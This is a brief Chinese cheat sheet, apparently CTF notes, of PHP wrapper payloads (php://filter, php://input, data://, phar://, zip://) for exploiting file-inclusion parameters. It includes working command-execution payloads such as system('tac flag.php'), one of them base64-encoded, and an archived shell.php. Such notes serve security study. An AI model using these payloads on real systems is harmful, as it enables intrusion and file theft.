首页 WEB

php 伪协议

?file=php://filter/convert.base64-encode/resource=flag.php
?file=php://input
post:<?php system("tac flag.php");?>

data 伪协议

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmwwZy5waHAnKTsgPz4

phar 伪协议

?file=phar:// 压缩包名 / 内部文件名
例:phar://x.zip/x.php

在这里插入图片描述

在这里插入图片描述

zip 伪协议

?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名]
例: zip://xxx.png#shell.php

在这里插入图片描述

更新于 阅读次数